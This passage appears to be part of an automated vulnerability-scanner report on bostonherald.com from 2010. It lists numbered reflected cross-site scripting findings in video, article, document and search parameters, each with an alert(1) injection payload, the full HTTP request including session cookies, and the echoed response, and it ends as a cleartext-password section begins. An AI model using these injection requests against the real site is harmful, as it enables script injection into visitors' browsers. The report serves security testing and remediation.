Cookie: bhfont=12; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC; OAX=rnoX2kzXQXwACWRq; bhpopup=on; __utmz=235728274.1289175424.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1292731211-1289175424376; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.14.10.1289175424; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.4.10.1289175481; RMFD=011PFFPzO101yed8|O1021J6R

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 03:50:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2802
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- This Page is for Inclusion i
...[SNIP]...
age
           // http://cache.heraldinteractive.com/images/version5.0/site_images/click_to_play.jpg
           
           tmObj.set("PreviewImageURL","http://multimedia.bostonherald.com/video/20101106/110610weddingmg.flv26471</script><script>alert(1)</script>312f5f181e0.jpg");
           tmObj.set("EndSlateURL","http://multimedia.bostonherald.com/video/20101106/110610weddingmg.flv26471</script>
...[SNIP]...

2.18. http://bostonherald.com/mediacenter/video.php [title parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /mediacenter/video.php

Issue detail

The value of the title request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1225e</script><script>alert(1)</script>a62b7470be2 was submitted in the title parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20101106/110610weddingmg.flv&media_id=1697&title=Wedding%20limo%20highjacking1225e</script><script>alert(1)</script>a62b7470be2&program_id=4c6ebfbed6269&width=320&height=275 HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC; OAX=rnoX2kzXQXwACWRq; bhpopup=on; __utmz=235728274.1289175424.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1292731211-1289175424376; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.14.10.1289175424; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.4.10.1289175481; RMFD=011PFFPzO101yed8|O1021J6R

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 03:50:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2682
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- This Page is for Inclusion i
...[SNIP]...
d.com/mediacenter/retrieve_video.php?redirect=http%3A%2F%2Fmultimedia.bostonherald.com%2Fvideo%2F20101106%2F110610weddingmg.flv&video_id=1697");
tmObj.set("VideoTitle", "Wedding limo highjacking1225e</script><script>alert(1)</script>a62b7470be2");
tmObj.set("Category", "");

           // Default slate image
           // http://cache.heraldinteractive.com/images/version5.0/site_images/click_to_play.jpg
           
           tmObj.set("PreviewImageURL","
...[SNIP]...

2.19. http://bostonherald.com/mediacenter/video.php [width parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /mediacenter/video.php

Issue detail

The value of the width request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4376"><script>alert(1)</script>4dba9d01cd was submitted in the width parameter. This input was echoed as f4376\"><script>alert(1)</script>4dba9d01cd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20101106/110610weddingmg.flv&media_id=1697&title=Wedding%20limo%20highjacking&program_id=4c6ebfbed6269&width=320f4376"><script>alert(1)</script>4dba9d01cd&height=275 HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC; OAX=rnoX2kzXQXwACWRq; bhpopup=on; __utmz=235728274.1289175424.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1292731211-1289175424376; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.14.10.1289175424; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.4.10.1289175481; RMFD=011PFFPzO101yed8|O1021J6R

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 03:50:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2675
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- This Page is for Inclusion i
...[SNIP]...
<div id="adCompanionSubstitute" class="w320f4376\"><script>alert(1)</script>4dba9d01cdxh275">
...[SNIP]...

2.20. http://bostonherald.com/news/columnists/view.bg [format parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /news/columnists/view.bg

Issue detail

The value of the format request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload af359'-alert(1)-'ec9b8fee0e1 was submitted in the format parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/columnists/view.bg?articleid=1294590&format=commentsaf359'-alert(1)-'ec9b8fee0e1&srvc=news&position=3 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:29:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 44578

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<script type="text/javascript">

       // Converts the GET params to a JSON object
       GET_Params = 'articleid=1294590&format=commentsaf359'-alert(1)-'ec9b8fee0e1&srvc=news&position=3'.toQueryParams();
       
       //alert(Object.inspect(GET_Params));
       //-----------------------------------------------------------------
       function updatePage(key,val) {
       //-------
...[SNIP]...

2.21. http://bostonherald.com/news/document.bg [f parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /news/document.bg

Issue detail

The value of the f request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3abb9"%3balert(1)//09f0d1d0ca6 was submitted in the f parameter. This input was echoed as 3abb9";alert(1)//09f0d1d0ca6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/document.bg?f=misc/100216housing.pdf3abb9"%3balert(1)//09f0d1d0ca6&h=Massachusetts%20Housing%20Partnership&k=bh HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:53:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 26495

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
<script type="text/javascript">

var iframe_container_div = $("iframe_wrapper");
var iframe_pdf_source = "http://multimedia.bostonherald.com/misc/100216housing.pdf3abb9";alert(1)//09f0d1d0ca6";

a1 = document.createElement("iframe");
a1.setAttribute("id","document_reader");
a1.setAttribute("src",iframe_pdf_source);
a1.setAttribute("frameborder","0");
a1.setAttribute("scrolling","no")
...[SNIP]...

2.22. http://bostonherald.com/news/document.bg [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /news/document.bg

Issue detail

The value of the h request parameter is copied into the HTML document as plain text between tags. The payload 82da8<script>alert(1)</script>be396cef868 was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/document.bg?f=misc/100216housing.pdf&h=Massachusetts%20Housing%20Partnership82da8<script>alert(1)</script>be396cef868&k=bh HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:54:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 26521

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
<h1>Massachusetts Housing Partnership82da8<script>alert(1)</script>be396cef868</h1>
...[SNIP]...

2.23. http://bostonherald.com/news/regional/view.bg [format parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /news/regional/view.bg

Issue detail

The value of the format request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 520d6'-alert(1)-'5950651885a was submitted in the format parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/regional/view.bg?articleid=1294599&format=comments520d6'-alert(1)-'5950651885a&srvc=news&position=2 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:15:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 40855

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<script type="text/javascript">

       // Converts the GET params to a JSON object
       GET_Params = 'articleid=1294599&format=comments520d6'-alert(1)-'5950651885a&srvc=news&position=2'.toQueryParams();
       
       //alert(Object.inspect(GET_Params));
       //-----------------------------------------------------------------
       function updatePage(key,val) {
       //-------
...[SNIP]...

2.24. http://bostonherald.com/search/ [topic parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /search/

Issue detail

The value of the topic request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 68cfb</script><script>alert(1)</script>aa25e7cca37 was submitted in the topic parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search/?topic=Jessica68cfb</script><script>alert(1)</script>aa25e7cca37 Fargen&type=byline&searchSite=recent&x=10&y=10 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 03:09:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
<script language="Javascript">
// Ajax search


page($('search_opt_type').options[$('search_opt_type').selectedIndex].value,'1','','search','Jessica68cfb</script><script>alert(1)</script>aa25e7cca37');
//pageTracker._trackPageview('/search/index.bg?&amp;order=&amp;page=1');
location.hash='articleFull';
</script>
...[SNIP]...

2.25. http://bostonherald.com/search/ [topic parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /search/

Issue detail

The value of the topic request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4de6f"><script>alert(1)</script>4f07299c93e was submitted in the topic parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/?topic=Jessica4de6f"><script>alert(1)</script>4f07299c93e Fargen&type=byline&searchSite=recent&x=10&y=10 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 03:09:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
<input class="mainSearchinut" id="searchInput" type="text" value="Jessica4de6f"><script>alert(1)</script>4f07299c93e" name="topic" />
...[SNIP]...

2.26. http://bostonherald.com/sports/football/patriots/view.bg [format parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /sports/football/patriots/view.bg

Issue detail

The value of the format request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 23db4'-alert(1)-'fa7faa1b9d9 was submitted in the format parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sports/football/patriots/view.bg?articleid=1294646&format=comments23db4'-alert(1)-'fa7faa1b9d9&srvc=home&position=active HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:27:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 46557

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<script type="text/javascript">

       // Converts the GET params to a JSON object
       GET_Params = 'articleid=1294646&format=comments23db4'-alert(1)-'fa7faa1b9d9&srvc=home&position=active'.toQueryParams();
       
       //alert(Object.inspect(GET_Params));
       //-----------------------------------------------------------------
       function updatePage(key,val) {
       //--
...[SNIP]...

2.27. http://bostonherald.com/sports/football/patriots/view.bg [format parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /sports/football/patriots/view.bg

Issue detail

The value of the format request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3bf7"><script>alert(1)</script>8da545a59fc was submitted in the format parameter. This input was echoed as f3bf7\"><script>alert(1)</script>8da545a59fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports/football/patriots/view.bg?articleid=1294646&format=commentsf3bf7"><script>alert(1)</script>8da545a59fc&srvc=home&position=active HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:27:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 46692

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<a class="bold current" href="/sports/football/patriots/view.bg?&articleid=1294646&amp;format=commentsf3bf7\"><script>alert(1)</script>8da545a59fc&amp;page=1&amp;listingType=pats#articleFull" >
...[SNIP]...

3. Cleartext submission of password  previous  next
There are 28 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


3.1. http://bostonherald.com/business/automotive/view/20101107blinking_jetta_hates_her_husband/format=comments&srvc=home&position=also  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /business/automotive/view/20101107blinking_jetta_hates_her_husband/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /business/automotive/view/20101107blinking_jetta_hates_her_husband/format=comments&srvc=home&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
